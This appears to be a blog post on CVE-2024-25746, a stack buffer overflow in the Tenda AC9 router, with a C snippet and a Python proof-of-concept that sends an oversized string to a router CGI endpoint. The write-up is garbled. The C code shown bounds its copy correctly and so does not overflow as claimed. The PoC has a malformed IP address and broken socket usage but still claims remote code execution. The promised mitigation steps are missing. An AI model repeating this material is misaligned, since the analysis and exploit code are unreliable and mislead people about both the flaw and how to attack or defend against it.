Tenda AC9 is a popular dual-band gigabit wireless router that offers a cost-effective solution for users seeking superior range and performance. However, a newly discovered critical stack-based buffer overflow vulnerability (CVE-2024-25746) has been identified in Tenda AC9 v.3. with firmware version v.15.03.06.42_multi, which potentially allows remote attackers to execute arbitrary code on the device. In this post, we will delve into the details of the CVE-2024-25746 vulnerability, examine the potentially harmful code snippets, and discuss the exploit.
Vulnerability Details
The CVE-2024-25746 vulnerability exists in the "add_white_node" function. This function is responsible for adding a node to the white list of the wireless router. However, due to insecure handling of user-supplied data, attackers can trigger this stack-based buffer overflow vulnerability by sending overly long strings to the add_white_node function. Consequently, remote attackers can exploit this vulnerability to execute arbitrary code on the device, which could lead to a total compromise of the router.
Consider the following code snippet demonstrating the vulnerable add_white_node function
void add_white_node(char* nodeName, int nodeValue) {
char buffer[256];
strncpy(buffer, nodeName, sizeof(buffer));
buffer[sizeof(buffer) - 1] = '\';
// ... (rest of the function)
}
In this code snippet, the function receives a nodeName string and an integer value nodeValue. The developers intended to copy the input string nodeName to a local buffer of 256 bytes, using the strncpy function. However, this code snippet is flawed because it does not strip excessively long strings, and the strncpy function accommodates a considerable amount of characters that exceed the buffer size. As a result, this can cause a buffer overflow condition, overwrite memory stored on the stack, and allow an attacker to manipulate the program's execution flow.
Exploit Details
To exploit this vulnerability, an attacker can craft a malicious payload that contains an overly long string targeting the add_white_node function by leveraging a large input string (more than 256 bytes) and carefully craft a shellcode that overwrites the return address stored on the stack. As a result, the program's execution is redirected to an attacker's malicious code, causing remote code execution.
The following is a simplified proof-of-concept (PoC) exploit for the vulnerability
import socket
TARGET_IP = "192.168..1"
TARGET_PORT = 808
NODE_NAME = "A" * 260
PAYLOAD = "POST /cgi-bin/add_white_node?node_name=" + NODE_NAME
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((TARGET_IP, TARGET_PORT))
print("[+] Sending exploit payload...")
sock.sendall(PAYLOAD)
sock.close()
print("[+] Payload sent successfully!")
This PoC demonstrates how an attacker would send a crafted payload to the router, potentially triggering the buffer overflow vulnerability, resulting in remote code execution.
Mitigation
Tenda has acknowledged the issue and is currently working on addressing this vulnerability in a future firmware update. Until then, users can follow these steps to minimize the risk associated with this vulnerability:
Original References
- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25746
- Tenda AC9 v.3. Firmware Update: https://www.tendacn.com/en/product/ac120.html
Conclusion
The CVE-2024-25746 stack-based buffer overflow vulnerability in Tenda AC9 v.3. with firmware version v.15.03.06.42_multi serves as a reminder to continually secure software and hardware against potential threats. As cyber attackers become more sophisticated, it is crucial to stay vigilant in identifying and addressing vulnerabilities. We urge users to follow the mitigation steps provided and regularly update their devices with the latest firmware to minimize the risk of being compromised.
Timeline
Published on: 02/22/2024 22:15:47 UTC
Last modified on: 02/23/2024 02:42:54 UTC